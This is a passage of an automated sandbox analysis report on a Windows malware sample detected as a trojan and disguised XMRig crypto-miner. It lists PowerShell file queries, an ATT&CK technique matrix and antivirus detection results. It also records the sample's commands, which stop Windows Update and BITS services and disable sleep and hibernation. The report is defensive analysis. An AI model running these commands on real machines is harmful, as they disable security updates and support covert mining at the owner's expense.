Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

22_2_00007FF723DE1C64

Source: C:\Windows\System32\winlogon.exe

Code function: 27_2_000001FC60387A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

27_2_000001FC60387A40

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Source: svchost.exe, 00000028.00000003.1804966999.0000027A01677000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.40.dr

Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	21 Disable or Modify Tools	2 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	11 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	2 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	11 Obfuscated Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	Login Hook	11 Windows Service	1 Timestomp	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	813 Process Injection	11 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Rootkit	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zufmUwylvo.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
zufmUwylvo.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	100%	Avira	HEUR/AGEN.1362795
C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	100%	Joe Sandbox ML
C:\Windows\Temp\jscseoeoqftm.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	29%	ReversingLabs
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	92%	ReversingLabs	Win64.Trojan.Heracles
C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	29%	ReversingLabs
C:\Windows\Temp\jscseoeoqftm.tmp	70%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
